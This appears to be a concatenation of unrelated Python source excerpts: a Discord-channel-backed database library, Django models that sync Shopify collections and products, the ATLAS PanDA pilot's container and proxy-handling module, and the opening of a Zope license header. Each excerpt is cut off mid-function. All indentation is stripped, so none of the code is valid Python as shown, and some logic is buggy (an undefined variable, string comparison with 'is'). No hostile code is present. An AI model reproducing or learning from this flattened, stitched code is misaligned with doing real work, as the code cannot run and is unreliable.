raise Exception("guild does not exist: " + str(database_guild))
else:
raise TypeError("database_guild must be an int or guild object")
if not self.db.me.guild_permissions.administrator:
raise Warning("Warning: client does not have administrator permissions on database guild, CREATE and DROP operations may not be successful")
def use(self, name):
"""Changes the active database"""
if self.violates_str_rules(name) or self.violates_name_rules(name) or " " in name:
raise TypeError("Malformed use; illegal character")
for d in self.db.categories:
if d.name.lower() == name.lower():
self.ad = d
return True
raise NameError("No database with name")
async def create_database(self, name):
"""Creates a database and sets it to the active database"""
if self.violates_str_rules(name) or self.violates_name_rules(name) or " " in name:
raise TypeError("Malformed create; illegal character")
for d in self.db.categories:
if d.name.lower() == name.lower():
raise NameError("Database with name already exists")
overwrites = {
self.db.default_role: discord.PermissionOverwrite(read_messages=False),
self.db.me: discord.PermissionOverwrite(read_messages=True)
}
self.ad = await self.db.create_category(name, overwrites=overwrites ,reason="SDDB: New Database")
await self.db.create_text_channel(name, category=self.ad, reason="SDDB: New Database")
return True
async def drop_database(self, name):
"""Drops the database"""
if self.violates_str_rules(name) or self.violates_name_rules(name) or " " in name:
raise TypeError("Malformed drop; illegal character")
for d in self.db.categories:
if d.name.lower() == name.lower():
for t in d.channels:
await t.delete(reason="SDDB: Drop Database")
await d.delete(reason="SDDB: Drop Database")
self.ad = None
return True
raise NameError("Database with name does not exist")
async def alter_database(self, name):
"""Alters the database"""
if self.violates_str_rules(name) or self.violates_name_rules(name) or " " in name:
raise TypeError("Malformed alter; illegal character")
if self.ad == None or (self.ad == None and use == ""):
raise Exception("No active database")
for d in self.db.categories:
if d.name.lower() == name.lower():
raise NameError("Database with name already exists")
for d in self.db.categories:
if d.name.lower() == self.ad.name.lower():
master_table = None
for t in self.ad.channels:
if t.name.lower() == name.lower():
raise NameError("Table exists with name, rename offending table and try again")
if t.name.lower() == self.ad.name.lower():
master_table = t
await master_table.edit(name=name, reason="SDDB: Alter Database")
await d.edit(name=name, reason="SDDB: Alter Database")
self.ad = d # update the database pointer as it may have changed
return True
async def create_table(self, name, **kwargs):
"""Creates a table on the active database"""
if self.ad == None:
raise Exception("No active database")
if self.violates_str_rules(name) or self.violates_name_rules(name) or " " in name:
raise TypeError("Malformed create; illegal character")
if name.lower() == "master":
raise NameError("master is a reserved table name")
if self.ad.name.lower() == name.lower():
raise NameError("Table cannot have same name as parent database")
if len(self.ad.channels) == 1024:
raise Exception("Maximum number of tables reached; 1024")
table_header = ""
for field in kwargs:
if self.violates_str_rules(field) or self.violates_name_rules(field) or field == "" or " " in field:
raise TypeError("Malformed create; illegal character")
if self.violates_datatype_rules(kwargs[field]):
raise TypeError("Malformed create; illegal datatype")
table_header = table_header + str(field) + " " + str(kwargs[field]) + chr(0x2502)
mt = None
for t in self.ad.channels:
if t.name.lower() == name.lower():
raise NameError("Table with name already exists")
if t.name.lower() == self.ad.name.lower():
mt = t
new_table = await self.db.create_text_channel(name, category=self.ad, reason="SDDB: New Table")
await mt.send(name + chr(0x2502) + table_header)
return True
async def drop_table(self, name):
"""Drops the table on the active database"""
if self.ad == None:
raise Exception("No active database")
if self.violates_str_rules(name) or self.violates_name_rules(name) or " " in name:
raise TypeError("Malformed drop; illegal character")
if name.lower() == self.ad.name.lower():
raise NameError("Cannot drop table; illegal operation")
table = None
master_table = None
for t in self.ad.channels:
if t.name.lower() == name.lower():
table = t
if t.name.lower() == self.ad.name.lower():
master_table = t
if table == None:
raise NameError("Table with name does not exist")
for record in await master_table.history(limit=1024).flatten():
if record.content.split(chr(0x2502))[0].lower() == table.name.lower():
await record.delete()
break
await table.delete(reason="SDDB: Drop Table")
return True
async def alter_table(self, name, add="", drop="", modify="", rename=""):
"""Alters a table on the active database"""
if self.ad == None:
raise Exception("No active database")
if self.violates_str_rules(name, drop, rename) or self.violates_name_rules(name):
raise NameError("Malformed alter; illegal character")
if name.lower() == self.ad.name.lower():
raise NameError("Cannot alter master table")
successful = False
headers = None
table = None
header_row = None
for t in self.ad.channels:
if t.name.lower() == self.ad.name.lower():
mt_records = await t.history(limit=1024).flatten()
for record in mt_records:
if name.lower() == record.content.split(chr(0x2502))[0]:
headers = self.build_table_headers(record)
del headers[0] # Don't track id here
header_row = record
break
if t.name.lower() == name.lower():
table = t
if table == None:
raise NameError("No table with name: " + name)
# add
if add != "":
new_col = add.split(" ", 1)
if self.violates_name_rules(new_col[0]):
raise NameError("Malformed alter; illegal character")
if self.violates_datatype_rules(new_col[1]):
raise TypeError("Malformed alter; illegal datatype")
await header_row.edit(content=header_row.content + new_col[0] + " " + new_col[1] + chr(0x2502))
for row in await table.history(limit=1024).flatten():
await row.edit(content=row.content + "" + chr(0x2502))
successful = True
# drop
if drop != "":
if self.violates_name_rules(drop):
raise NameError("Malformed alter; illegal character")
column_exists = False
for i in range(len(headers)):
if headers[i].column_name.lower() == drop.lower():
column_exists = True
fractured_header = header_row.content.split(chr(0x2502))
rebuilt_header = ""
for x in range(len(fractured_header)):
if x-1 != i:
rebuilt_header += fractured_header[x] + chr(0x2502)
await header_row.edit(content=rebuilt_header[:-1])
for row in await table.history(limit=1024).flatten():
fractured_row = row.content.split(chr(0x2502))
rebuilt_row = ""
for x in range(len(fractured_row)):
if x != i:
rebuilt_row += fractured_row[x] + chr(0x2502)
await row.edit(content=rebuilt_row[:-1])
successful = True
if not column_exists:
raise NameError("No column with name " + drop)
# modify
if modify != "":
if self.violates_name_rules(modify):
raise NameError("Malformed alter; illegal character")
mod_col = modify.split(" ", 2)
if self.violates_name_rules(mod_col[1]):
raise NameError("Malformed alter; illegal character")
if self.violates_datatype_rules(mod_col[2]):
raise TypeError("Malformed alter; illegal datatype")
header_exits = False
for header in headers:
if header.column_name.lower() == mod_col[0].lower():
header_exits = True
break
if header_exits:
fractured_header = header_row.content.split(mod_col[0], 1)
fractured_header[1] = chr(0x2502) + fractured_header[1].split(chr(0x2502), 1)[1]
await header_row.edit(content=fractured_header[0] + mod_col[1] + " " + mod_col[2] + fractured_header[1])
successful = True
else:
raise NameError("No column with name " + mod_col[0])
# rename
if rename != "":
if self.ad.name.lower() == rename.lower():
raise NameError("Table cannot have same name as parent database")
for t in self.ad.channels:
if t.name.lower() == rename.lower():
raise NameError("Table with name already exists")
new_headers = ""
for header in header_row.content.split(chr(0x2502)):
if header.lower() == name.lower():
header = rename
new_headers += header + chr(0x2502)
await header_row.edit(content=new_headers[:-1])
await table.edit(name=rename, reason="SDDB: Alter Table")
successful = True
if successful:
return True
return False
async def query(self, select="*", against="", where="", use=""):
"""Queries the active database"""
if self.ad == None or (self.ad == None and use == ""):
raise Exception("No active database")
if not isinstance(select, str) or not isinstance(against, str) or not isinstance(use, str) or not isinstance(where, str):
raise TypeError("Malformed query; unexpected datatype, str only")
if self.violates_str_rules(select, against, where, use):
raise TypeError("Malformed query; illegal character")
if select is "":
raise NameError("Malformed query; invalid SELECT")
if against is "":
raise NameError("Malformed query; invalid AGAINST (FROM)")
adstore = self.change_ad_pointer(use)
headers = None
table = None
for t in self.ad.channels:
if t.name.lower() == self.ad.name.lower():
mt_records = await t.history(limit=1024).flatten()
for record in mt_records:
if against.lower() == record.content.split(chr(0x2502))[0]:
headers = self.build_table_headers(record)
break
if t.name.lower() == against.lower():
table = t
if table == None:
if adstore is not None:
self.change_ad_pointer(adstore)
raise NameError("No table with name: " + against)
# validate select
selected_cols = []
if select != "*":
selectables = select.split(",")
for i in range(len(selectables)):
selectables[i] = selectables[i].strip()
selectables[i] = selectables[i].lower()
for i in range(len(headers)):
if headers[i].column_name.lower() in selectables:
selected_cols.append(i)
selectables.remove(headers[i].column_name.lower())
if len(selectables) > 0:
invalid_selected = ""
for s in selectables:
invalid_selected += " " + s
if adstore is not None:
self.change_ad_pointer(adstore)
raise Exception("Malformed query; selected columns not in table headers," + invalid_selected)
rawrows = await table.history(limit=1024).flatten()
full_table = Table(against, headers, rawrows)
match_table = Table(against, headers)
clauses = self.parse_where(where)
for row in full_table.rows:
for clause in clauses: # TODO: this will need to be changed to support and/or operators
if self.match_where(clause, row):
match_table.append(row)
# build the selected table
if len(selected_cols) != 0:
selected_headers = []
selected_rows = []
for i in selected_cols:
selected_headers.append(match_table.headers[i])
for row in match_table.rows:
selected_records = []
for i in range(len(row.records)):
if i in selected_cols:
selected_records.append(row.records[i])
selected_rows.append(TableRow(selected_headers, table_records=selected_records))
match_table = Table(against, selected_headers, table_rows=selected_rows)
# cleanup
if adstore is not None:
self.change_ad_pointer(adstore)
return match_table
async def insert_into(self, against, use="", **kwargs):
"""Insert a row into a table"""
if self.ad == None or (self.ad == None and use == ""):
raise Exception("No active database")
if not isinstance(against, str) or not isinstance(use, str):
raise TypeError("Malformed insert; table or use must be a str")
if self.violates_str_rules(against) or self.violates_name_rules(against):
raise TypeError("Malformed insert; illegal character")
adstore = self.change_ad_pointer(use)
table = None
headers = None
for t in self.ad.channels:
if t.name.lower() == self.ad.name.lower():
mt_records = await t.history(limit=1024).flatten()
for record in mt_records:
if against.lower() == record.content.split(chr(0x2502))[0].lower():
headers = self.build_table_headers(record)
del headers[0] # Don't track id here
break
if t.name.lower() == against.lower():
table = t
if table == None:
if adstore is not None:
self.change_ad_pointer(adstore)
raise NameError("No table with name: " + against)
if len(kwargs) > len(headers):
if adstore is not None:
self.change_ad_pointer(adstore)
raise Exception("Number of columns exceeds table definition")
if len(await table.history(limit=1024).flatten()) == 1024:
if adstore | |
return getattr(self, field, '').strip()
@property
def custom_collection_family_metafield_value_value(self):
field = 'metafield_value_collection_family_custom_value'
value = getattr(self, field, '').strip()
if not value:
return None
return json.loads(value)
@property
def custom_collection_tag_names_value(self):
field = 'tag_names_collection_custom_value'
value = getattr(self, field, '').strip()
if not value:
return None
return json.loads(value)
@property
def metafields_dict_display_name_value(self):
choice_field = 'metafield_value_display_name_choice'
value = getattr(self, getattr(self, choice_field))
if not value:
return None
return [
{
'namespace': 'additional',
'key': 'display_name',
'owner_resource': ShopifyMetafield.COLLECTION_OWNER_RESOURCE,
'value': value,
'value_type': ShopifyMetafield.STRING_VALUE_TYPE
}
]
@property
def metafields_dict_collection_family_value(self):
choice_field = 'metafield_value_collection_family_choice'
values = getattr(self, getattr(self, choice_field))
if not values:
return None
return [
{
'namespace': 'additional',
'key': 'collection_family',
'owner_resource': ShopifyMetafield.COLLECTION_OWNER_RESOURCE,
'value': json.dumps(values),
'value_type': ShopifyMetafield.JSON_VALUE_TYPE
}
]
@property
def metafields_dict_custom_value(self):
attr = 'metafields_custom_value'
values = getattr(self, attr)
if not values:
return None
return sorted(
json.loads(values.strip()),
key=lambda k: k['value']
)
@property
def metafields_dict_all_value(self):
attrs = [
'metafields_dict_display_name_value',
'metafields_dict_collection_family_value',
'metafields_dict_custom_value'
]
metafields = []
for attr in attrs:
values = getattr(self, attr)
if values:
metafields += values
if not metafields:
return None
return sorted(metafields, key=lambda k: k['value'])
@property
def tags_dict_collection_value(self):
choice_field = 'tag_names_collection_choice'
values = getattr(self, getattr(self, choice_field))
if not values:
return None
return sorted(
[
{'name': tag_name}
for tag_name in values
],
key=lambda k: k['name']
)
@property
def tags_dict_custom_value(self):
attr = 'tags_custom_value'
values = getattr(self, attr)
if not values:
return None
return sorted(
json.loads(values.strip()),
key=lambda k: k['name']
)
@property
def tags_dict_all_value(self):
attrs = [
'tags_dict_collection_value',
'tags_dict_custom_value'
]
tags = []
for attr in attrs:
values = getattr(self, attr)
if values:
tags += values
if not tags:
return None
return sorted(tags, key=lambda k: k['name'])
# </editor-fold>
# <editor-fold desc="value preview properties ...">
@property
def sema_category_title_value_preview(self):
value_attr = 'sema_category_title_value'
return getattr(self, value_attr)
sema_category_title_value_preview.fget.short_description = (
'SEMA Category Title'
)
@property
def sema_category_chained_title_value_preview(self):
value_attr = 'sema_category_chained_title_value'
return getattr(self, value_attr)
sema_category_chained_title_value_preview.fget.short_description = (
'SEMA Category Chained Title'
)
@property
def sema_category_tag_names_value_preview(self):
value_attr = 'sema_category_tag_names_value'
values = getattr(self, value_attr, None)
if not values:
return None
return get_json_preview(json.dumps(values))
sema_category_tag_names_value_preview.fget.short_description = (
'SEMA Category Tag Names'
)
@property
def shopify_collection_collection_family_value_preview(self):
value_attr = 'shopify_collection_collection_family_value'
values = getattr(self, value_attr, None)
if not values:
return None
return get_json_preview(json.dumps(values))
shopify_collection_collection_family_value_preview.fget.short_description = (
'Shopify Collection Family'
)
@property
def metafields_dict_display_name_value_preview(self):
value_attr = 'metafields_dict_display_name_value'
values = getattr(self, value_attr, None)
if not values:
return None
return get_json_preview(json.dumps(values))
@property
def metafields_dict_collection_family_value_preview(self):
value_attr = 'metafields_dict_collection_family_value'
values = getattr(self, value_attr, None)
if not values:
return None
return get_json_preview(json.dumps(values))
@property
def metafields_dict_custom_value_preview(self):
value_attr = 'metafields_dict_custom_value'
values = getattr(self, value_attr, None)
if not values:
return None
return get_json_preview(json.dumps(values))
@property
def metafields_dict_all_value_preview(self):
value_attr = 'metafields_dict_all_value'
values = getattr(self, value_attr, None)
if not values:
return None
return get_json_preview(json.dumps(values))
@property
def tags_dict_collection_value_preview(self):
value_attr = 'tags_dict_collection_value'
values = getattr(self, value_attr, None)
if not values:
return None
return get_json_preview(json.dumps(values))
@property
def tags_dict_custom_value_preview(self):
value_attr = 'tags_dict_custom_value'
values = getattr(self, value_attr, None)
if not values:
return None
return get_json_preview(json.dumps(values))
@property
def tags_dict_all_value_preview(self):
value_attr = 'tags_dict_all_value'
values = getattr(self, value_attr, None)
if not values:
return None
return get_json_preview(json.dumps(values))
# </editor-fold>
# <editor-fold desc="result properties ...">
@property
def title_result(self):
choice_field = 'title_choice'
return getattr(self, getattr(self, choice_field))
title_result.fget.short_description = ''
@property
def metafields_result(self):
choice_field = 'metafields_choice'
return getattr(self, getattr(self, choice_field))
metafields_result.fget.short_description = ''
@property
def tags_result(self):
choice_field = 'tags_choice'
return getattr(self, getattr(self, choice_field))
tags_result.fget.short_description = ''
# </editor-fold>
# <editor-fold desc="result preview properties ...">
@property
def title_result_preview(self):
result_attr = 'title_result'
return getattr(self, result_attr)
@property
def metafields_result_preview(self):
result_attr = 'metafields_result'
values = getattr(self, result_attr)
if not values:
return None
return get_json_preview(json.dumps(values))
@property
def tags_result_preview(self):
result_attr = 'tags_result'
values = getattr(self, result_attr)
if not values:
return None
return get_json_preview(json.dumps(values))
# </editor-fold>
# <editor-fold desc="current properties ...">
@property
def title_current(self):
field = 'title'
return self.get_shopify_collection_attr_value(field)
title_current.fget.short_description = ''
@property
def metafields_current(self):
metafields = self.shopify_metafields
if not metafields:
return None
return sorted(
[
{
'namespace': metafield.namespace,
'key': metafield.key,
'owner_resource': metafield.owner_resource,
'value': metafield.value,
'value_type': metafield.value_type
}
for metafield in metafields
],
key=lambda k: k['value']
)
metafields_current.fget.short_description = ''
@property
def tags_current(self):
tags = self.shopify_tags
if not tags:
return None
return sorted(
[{'name': tag.name} for tag in tags],
key=lambda k: k['name']
)
tags_current.fget.short_description = ''
# </editor-fold>
# <editor-fold desc="current preview properties ...">
@property
def title_current_preview(self):
current_attr = 'title_current'
return getattr(self, current_attr)
@property
def metafields_current_preview(self):
current_attr = 'metafields_current'
values = getattr(self, current_attr)
if not values:
return None
return get_json_preview(json.dumps(values))
@property
def tags_current_preview(self):
current_attr = 'tags_current'
values = getattr(self, current_attr)
if not values:
return None
return get_json_preview(json.dumps(values))
# </editor-fold>
# <editor-fold desc="match properties ...">
def title_match(self):
current_attr = 'title_current'
result_attr = 'title_result'
current = getattr(self, current_attr)
result = getattr(self, result_attr)
if not result:
return None
return bool(current == result)
title_match.boolean = True
title_match.short_description = 'Title Match'
def metafields_match(self):
current_attr = 'metafields_current'
result_attr = 'metafields_result'
current = getattr(self, current_attr)
result = getattr(self, result_attr)
if not result:
return None
return bool(current == result)
metafields_match.boolean = True
metafields_match.short_description = 'Metafields Match'
def tags_match(self):
current_attr = 'tags_current'
result_attr = 'tags_result'
current = getattr(self, current_attr)
result = getattr(self, result_attr)
if not result:
return None
return bool(current == result)
tags_match.boolean = True
tags_match.short_description = 'Tags Match'
def full_match(self):
return bool(
self.title_match() is not False
and self.metafields_match() is not False
and self.tags_match() is not False
)
full_match.boolean = True
full_match.short_description = 'Calculator Match'
# </editor-fold>
# <editor-fold desc="difference properties ...">
@property
def title_difference(self):
current_preview_attr = 'title_current_preview'
result_preview_attr = 'title_result_preview'
match_attr = 'title_match'
if getattr(self, match_attr)() is not False:
return ''
current_preview = getattr(self, current_preview_attr)
result_preview = getattr(self, result_preview_attr)
return f'{current_preview} <- {result_preview}'
title_difference.fget.short_description = ''
@property
def metafields_difference(self):
current_attr = 'metafields_current'
result_attr = 'metafields_result'
match_attr = 'metafields_match'
if getattr(self, match_attr)() is not False:
return ''
current = getattr(self, current_attr)
result = getattr(self, result_attr)
return get_json_preview(
diff(
current,
result,
syntax='symmetric',
dump=True
)
)
metafields_difference.fget.short_description = ''
@property
def tags_difference(self):
current_attr = 'tags_current'
result_attr = 'tags_result'
match_attr = 'tags_match'
if getattr(self, match_attr)() is not False:
return ''
current = getattr(self, current_attr)
result = getattr(self, result_attr)
return get_json_preview(
diff(
current,
result,
syntax='symmetric',
dump=True
)
)
tags_difference.fget.short_description = ''
# </editor-fold>
# <editor-fold desc="perform properties ...">
def perform_calculated_fields_update(self):
collection = self.shopify_collection
try:
if self.title_match() is False:
collection.title = self.title_result
collection.save()
if self.metafields_match() is False:
metafields_result = self.metafields_result
for metafield_data in metafields_result:
defaults = {
'value': metafield_data.pop('value'),
'value_type': metafield_data.pop('value_type')
}
ShopifyMetafield.objects.update_or_create(
object_id=collection.pk,
content_type=ContentType.objects.get_for_model(collection),
**metafield_data,
defaults=defaults
)
# for metafield in self.shopify_metafields: # FIXME
# metafield_data = {
# 'namespace': metafield.namespace,
# 'key': metafield.key,
# 'owner_resource': metafield.owner_resource,
# 'value': metafield.value,
# 'value_type': metafield.value_type
# }
# if metafield_data not in metafields_result:
# metafield.delete()
if self.tags_match() is False:
tags_result = self.tags_result
for tag_data in tags_result:
tag, _ = ShopifyTag.objects.get_or_create(**tag_data)
collection.tags.add(tag)
collection.save()
for tag in self.shopify_tags:
tag_data = {'name': tag.name}
if tag_data not in tags_result:
collection.tags.remove(tag)
collection.save()
return collection.get_update_success_msg()
except Exception as err:
return self.get_instance_error_msg(str(err))
# </editor-fold>
objects = ShopifyCollectionCalculatorManager()
def __str__(self):
return str(self.collection)
class ShopifyProduct(Model, MessagesMixin):
APPAREL_TYPE = 'Apparel'
AUTOMOTIVE_TYPE = 'Automotive Parts'
PRODUCT_TYPE_CHOICES = [
(APPAREL_TYPE, APPAREL_TYPE),
(AUTOMOTIVE_TYPE, AUTOMOTIVE_TYPE)
]
WEB_SCOPE = 'web'
GLOBAL_SCOPE = 'global'
PUBLISHED_SCOPE_CHOICES = [
(WEB_SCOPE, WEB_SCOPE),
(GLOBAL_SCOPE, GLOBAL_SCOPE)
]
product_id = BigIntegerField(
blank=True,
help_text='Populated by Shopify',
null=True,
unique=True
)
title = CharField(
blank=True,
max_length=100
)
body_html = TextField(
blank=True,
verbose_name='body HTML'
)
vendor = ForeignKey(
ShopifyVendor,
blank=True,
null=True,
related_name='products',
on_delete=CASCADE
)
product_type = CharField(
choices=PRODUCT_TYPE_CHOICES,
default=AUTOMOTIVE_TYPE,
max_length=20
)
is_published = BooleanField(
default=False
)
published_scope = CharField(
choices=PUBLISHED_SCOPE_CHOICES,
default=WEB_SCOPE,
max_length=10
)
tags = ManyToManyField(
ShopifyTag,
blank=True,
related_name='products'
)
seo_title = CharField(
blank=True,
max_length=200
)
seo_description = TextField(
blank=True
)
metafields = GenericRelation(
ShopifyMetafield,
related_query_name='product'
)
# <editor-fold desc="count properties ...">
@property
def variant_count(self):
return self.variants.count()
variant_count.fget.short_description = 'variant count'
@property
def option_count(self):
return self.options.count()
option_count.fget.short_description = 'option count'
@property
def image_count(self):
return self.images.count()
image_count.fget.short_description = 'image count'
@property
def metafield_count(self):
return self.metafields.count()
metafield_count.fget.short_description = 'metafield count'
@property
def tag_count(self):
return self.tags.count()
tag_count.fget.short_description = 'tag count'
# </editor-fold>
# <editor-fold desc="error properties ...">
@property
def warnings(self):
"""
Returns a concatenation of warnings.
:return: warnings
:rtype: str
"""
msgs = []
return ', '.join(msgs)
@property
def errors(self):
"""
Returns a concatenation of errors.
:return: errors
:rtype: str
"""
msgs = []
if not | |
<filename>pilot/user/atlas/container.py
#!/usr/bin/env python
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Authors:
# - <NAME>, <EMAIL>, 2017-2021
# - <NAME>, <EMAIL>, 2019-2020
import os
import pipes
import re
import logging
import traceback
# for user container test: import urllib
from pilot.common.errorcodes import ErrorCodes
from pilot.common.exception import PilotException, FileHandlingFailure
from pilot.user.atlas.setup import get_asetup, get_file_system_root_path
from pilot.user.atlas.proxy import verify_proxy
from pilot.info import InfoService, infosys
from pilot.util.config import config
from pilot.util.filehandling import write_file
from pilot.util import https
logger = logging.getLogger(__name__)
errors = ErrorCodes()
def get_payload_proxy(proxy_outfile_name, voms_role='atlas'):
"""
:param proxy_outfile_name: specify the file to store proxy
:param voms_role: what proxy (role) to request. It should exist on Panda node
:return: True on success
"""
try:
# it assumes that https_setup() was done already
url = os.environ.get('PANDA_SERVER_URL', config.Pilot.pandaserver)
res = https.request('{pandaserver}/server/panda/getProxy'.format(pandaserver=url), data={'role': voms_role})
if res is None:
logger.error("Unable to get proxy with role '%s' from panda server", voms_role)
return False
if res['StatusCode'] != 0:
logger.error("When get proxy with role '%s' panda server returned: %s", voms_role, res['errorDialog'])
return False
proxy_contents = res['userProxy']
except Exception as exc:
logger.error("Get proxy from panda server failed: %s, %s", exc, traceback.format_exc())
return False
res = False
try:
# pre-create empty proxy file with secure permissions. Prepare it for write_file() which can not
# set file permission mode, it will writes to the existing file with correct permissions.
_file = os.open(proxy_outfile_name, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
os.close(_file)
res = write_file(proxy_outfile_name, proxy_contents, mute=False) # returns True on success
except (IOError, OSError, FileHandlingFailure) as exc:
logger.error("Exception when try to save proxy to the file '%s': %s, %s",
proxy_outfile_name, exc, traceback.format_exc())
return res
def do_use_container(**kwargs):
"""
Decide whether to use a container or not.
:param kwargs: dictionary of key-word arguments.
:return: True if function has decided that a container should be used, False otherwise (boolean).
"""
# to force no container use: return False
use_container = False
job = kwargs.get('job', False)
copytool = kwargs.get('copytool', False)
if job:
# for user jobs, TRF option --containerImage must have been used, ie imagename must be set
if job.imagename and job.imagename != 'NULL':
use_container = True
logger.debug('job.imagename set -> use_container = True')
elif not (job.platform or job.alrbuserplatform):
use_container = False
logger.debug('not (job.platform or job.alrbuserplatform) -> use_container = False')
else:
queuedata = job.infosys.queuedata
container_name = queuedata.container_type.get("pilot")
if container_name:
use_container = True
logger.debug('container_name == \'%s\' -> use_container = True', container_name)
else:
logger.debug('else -> use_container = False')
elif copytool:
# override for copytools - use a container for stage-in/out
use_container = True
logger.debug('copytool -> use_container = False')
else:
logger.debug('not job -> use_container = False')
return use_container
def wrapper(executable, **kwargs):
"""
Wrapper function for any container specific usage.
This function will be called by pilot.util.container.execute() and prepends the executable with a container command.
:param executable: command to be executed (string).
:param kwargs: dictionary of key-word arguments.
:return: executable wrapped with container command (string).
"""
workdir = kwargs.get('workdir', '.')
pilot_home = os.environ.get('PILOT_HOME', '')
job = kwargs.get('job', None)
logger.info('container wrapper called')
if workdir == '.' and pilot_home != '':
workdir = pilot_home
# if job.imagename (from --containerimage <image>) is set, then always use raw singularity
if config.Container.setup_type == "ALRB": # and job and not job.imagename:
fctn = alrb_wrapper
else:
fctn = singularity_wrapper
return fctn(executable, workdir, job=job)
def extract_platform_and_os(platform):
"""
Extract the platform and OS substring from platform
:param platform (string): E.g. "x86_64-slc6-gcc48-opt"
:return: extracted platform specifics (string). E.g. "x86_64-slc6". In case of failure, return the full platform
"""
pattern = r"([A-Za-z0-9_-]+)-.+-.+"
found = re.findall(re.compile(pattern), platform)
if found:
ret = found[0]
else:
logger.warning("could not extract architecture and OS substring using pattern=%s from platform=%s"
"(will use %s for image name)", pattern, platform, platform)
ret = platform
return ret
def get_grid_image_for_singularity(platform):
"""
Return the full path to the singularity grid image
:param platform: E.g. "x86_64-slc6" (string).
:return: full path to grid image (string).
"""
if not platform or platform == "":
platform = "x86_64-slc6"
logger.warning("using default platform=%s (cmtconfig not set)", platform)
arch_and_os = extract_platform_and_os(platform)
image = arch_and_os + ".img"
_path = os.path.join(get_file_system_root_path(), "atlas.cern.ch/repo/containers/images/singularity")
path = os.path.join(_path, image)
if not os.path.exists(path):
image = 'x86_64-centos7.img'
logger.warning('path does not exist: %s (trying with image %s instead)', path, image)
path = os.path.join(_path, image)
if not os.path.exists(path):
logger.warning('path does not exist either: %s', path)
path = ""
return path
def get_middleware_type():
"""
Return the middleware type from the container type.
E.g. container_type = 'singularity:pilot;docker:wrapper;container:middleware'
get_middleware_type() -> 'container', meaning that middleware should be taken from the container. The default
is otherwise 'workernode', i.e. middleware is assumed to be present on the worker node.
:return: middleware_type (string)
"""
middleware_type = ""
container_type = infosys.queuedata.container_type
middleware = 'middleware'
if container_type and container_type != "" and middleware in container_type:
try:
container_names = container_type.split(';')
for name in container_names:
_split = name.split(':')
if middleware == _split[0]:
middleware_type = _split[1]
except IndexError as exc:
logger.warning("failed to parse the container name: %s, %s", container_type, exc)
else:
# logger.warning("container middleware type not specified in queuedata")
# no middleware type was specified, assume that middleware is present on worker node
middleware_type = "workernode"
return middleware_type
def extract_atlas_setup(asetup, swrelease):
"""
Extract the asetup command from the full setup command for jobs that have a defined release.
export ATLAS_LOCAL_ROOT_BASE=/cvmfs/atlas.cern.ch/repo/ATLASLocalRootBase;
source ${ATLAS_LOCAL_ROOT_BASE}/user/atlasLocalSetup.sh --quiet;source $AtlasSetup/scripts/asetup.sh
-> $AtlasSetup/scripts/asetup.sh, export ATLAS_LOCAL_ROOT_BASE=/cvmfs/atlas.cern.ch/repo/ATLASLocalRootBase; source
${ATLAS_LOCAL_ROOT_BASE}/user/atlasLocalSetup.sh --quiet;
:param asetup: full asetup command (string).
:param swrelease: ATLAS release (string).
:return: extracted asetup command, cleaned up full asetup command without asetup.sh (string).
"""
if not swrelease:
return '', ''
try:
# source $AtlasSetup/scripts/asetup.sh
atlas_setup = asetup.split(';')[-1]
# export ATLAS_LOCAL_ROOT_BASE=/cvmfs/atlas.cern.ch/repo/ATLASLocalRootBase;
# source ${ATLAS_LOCAL_ROOT_BASE}/user/atlasLocalSetup.sh --quiet;
cleaned_atlas_setup = asetup.replace(atlas_setup, '')
atlas_setup = atlas_setup.replace('source ', '')
except AttributeError as exc:
logger.debug('exception caught while extracting asetup command: %s', exc)
atlas_setup = ''
cleaned_atlas_setup = ''
return atlas_setup, cleaned_atlas_setup
def extract_full_atlas_setup(cmd, atlas_setup):
"""
Extract the full asetup (including options) from the payload setup command.
atlas_setup is typically '$AtlasSetup/scripts/asetup.sh'.
:param cmd: full payload setup command (string).
:param atlas_setup: asetup command (string).
:return: extracted full asetup command, updated full payload setup command without asetup part (string).
"""
updated_cmds = []
extracted_asetup = ""
if not atlas_setup:
return extracted_asetup, cmd
try:
_cmd = cmd.split(';')
for subcmd in _cmd:
if atlas_setup in subcmd:
extracted_asetup = subcmd
else:
updated_cmds.append(subcmd)
updated_cmd = ';'.join(updated_cmds)
except AttributeError as exc:
logger.warning('exception caught while extracting full atlas setup: %s', exc)
updated_cmd = cmd
logger.debug('updated payload setup command: %s', updated_cmd)
return extracted_asetup, updated_cmd
def update_alrb_setup(cmd, use_release_setup):
"""
Update the ALRB setup command.
Add the ALRB_CONT_SETUPFILE in case the release setup file was created earlier (required available cvmfs).
:param cmd: full ALRB setup command (string).
:param use_release_setup: should the release setup file be added to the setup command? (Boolean).
:return: updated ALRB setup command (string).
"""
updated_cmds = []
try:
_cmd = cmd.split(';')
for subcmd in _cmd:
if subcmd.startswith('source ${ATLAS_LOCAL_ROOT_BASE}') and use_release_setup:
updated_cmds.append('export ALRB_CONT_SETUPFILE="/srv/%s"' % config.Container.release_setup)
updated_cmds.append(subcmd)
updated_cmd = ';'.join(updated_cmds)
except AttributeError as exc:
logger.warning('exception caught while extracting full atlas setup: %s', exc)
updated_cmd = cmd
logger.debug('updated ALRB command: %s', updated_cmd)
return updated_cmd
def update_for_user_proxy(_cmd, cmd, is_analysis=False):
"""
Add the X509 user proxy to the container sub command string if set, and remove it from the main container command.
Try to receive payload proxy and update X509_USER_PROXY in container setup command
In case payload proxy from server is required, this function will also download and verify this proxy.
:param _cmd: container setup command (string).
:param cmd: command the container will execute (string).
:param is_analysis: True for user job (Boolean).
:return: exit_code (int), diagnostics (string), updated _cmd (string), updated cmd (string).
"""
exit_code = 0
diagnostics = ""
x509 = os.environ.get('X509_USER_PROXY', '')
if x509 != "":
# do not include the X509_USER_PROXY in the command the container will execute
cmd = cmd.replace("export X509_USER_PROXY=%s;" % x509, '')
# add it instead to the container setup command:
# download and verify payload proxy from the server if desired
proxy_verification = os.environ.get('PILOT_PROXY_VERIFICATION') == 'True' and os.environ.get('PILOT_PAYLOAD_PROXY_VERIFICATION') == 'True'
if proxy_verification and config.Pilot.payload_proxy_from_server and is_analysis:
exit_code, diagnostics, x509 = get_and_verify_payload_proxy_from_server(x509)
if exit_code | |
<gh_stars>1-10
##############################################################################
#
# Copyright (c) 2004 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
